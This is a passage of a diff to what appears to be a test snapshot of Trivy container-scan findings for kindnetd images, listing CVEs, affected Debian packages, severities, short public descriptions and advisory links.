"https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5901-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4209", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4209", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", - "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", - "https://gitlab.com/gnutls/gnutls/-/issues/1306", - "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", - "https://security.netapp.com/advisory/ntap-20220915-0005/", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://ubuntu.com/security/notices/USN-5750-1", - "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4209", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5750-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3389", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - "http://curl.haxx.se/docs/adv_20120124B.html", - "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - "http://ekoparty.org/2011/juliano-rizzo.php", - "http://eprint.iacr.org/2004/111", - "http://eprint.iacr.org/2006/136", - "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - "http://osvdb.org/74829", - "http://rhn.redhat.com/errata/RHSA-2012-0508.html", - "http://rhn.redhat.com/errata/RHSA-2013-1455.html", - "http://secunia.com/advisories/45791", - "http://secunia.com/advisories/47998", - "http://secunia.com/advisories/48256", - "http://secunia.com/advisories/48692", - "http://secunia.com/advisories/48915", - "http://secunia.com/advisories/48948", - "http://secunia.com/advisories/49198", - "http://secunia.com/advisories/55322", - "http://secunia.com/advisories/55350", - "http://secunia.com/advisories/55351", - "http://security.gentoo.org/glsa/glsa-201203-02.xml", - "http://security.gentoo.org/glsa/glsa-201406-32.xml", - "http://support.apple.com/kb/HT4999", - "http://support.apple.com/kb/HT5001", - "http://support.apple.com/kb/HT5130", - "http://support.apple.com/kb/HT5281", - "http://support.apple.com/kb/HT5501", - "http://support.apple.com/kb/HT6150", - "http://technet.microsoft.com/security/advisory/2588513", - "http://vnhacker.blogspot.com/2011/09/beast.html", - "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", - "http://www.debian.org/security/2012/dsa-2398", - "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", - "http://www.ibm.com/developerworks/java/jdk/alerts/", - "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", - "http://www.insecure.cl/Beast-SSL.rar", - "http://www.kb.cert.org/vuls/id/864643", - "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", - "http://www.opera.com/docs/changelogs/mac/1151/", - "http://www.opera.com/docs/changelogs/mac/1160/", - "http://www.opera.com/docs/changelogs/unix/1151/", - "http://www.opera.com/docs/changelogs/unix/1160/", - "http://www.opera.com/docs/changelogs/windows/1151/", - "http://www.opera.com/docs/changelogs/windows/1160/", - "http://www.opera.com/support/kb/view/1004/", - "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", - "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", - "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", - "http://www.redhat.com/support/errata/RHSA-2011-1384.html", - "http://www.redhat.com/support/errata/RHSA-2012-0006.html", - "http://www.securityfocus.com/bid/49388", - "http://www.securityfocus.com/bid/49778", - "http://www.securitytracker.com/id/1029190", - "http://www.securitytracker.com/id?1025997", - "http://www.securitytracker.com/id?1026103", - "http://www.securitytracker.com/id?1026704", - "http://www.ubuntu.com/usn/USN-1263-1", - "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", - "https://access.redhat.com/security/cve/CVE-2011-3389", - "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", - "https://bugzilla.novell.com/show_bug.cgi?id=719047", - "https://bugzilla.redhat.com/show_bug.cgi?id=737506", - "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", - "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", - "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", - "https://hermes.opensuse.org/messages/13154861", - "https://hermes.opensuse.org/messages/13155432", - "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", - "https://linux.oracle.com/cve/CVE-2011-3389.html", - "https://linux.oracle.com/errata/ELSA-2011-1380.html", - "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", - "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", - "https://ubuntu.com/security/notices/USN-1263-1", - "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3389", - }, - { - "type": "URL", - "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - }, - { - "type": "URL", - "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - }, - { - "type": "URL", - "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "http://curl.haxx.se/docs/adv_20120124B.html", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "http://ekoparty.org/2011/juliano-rizzo.php", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "http://eprint.iacr.org/2004/111", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "http://eprint.iacr.org/2006/136", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", + ], + }, + "category": "Vulnerability", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "references": [ { "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "http://osvdb.org/74829", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "references": [ { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "http://www.securityfocus.com/bid/108096", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", }, { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + 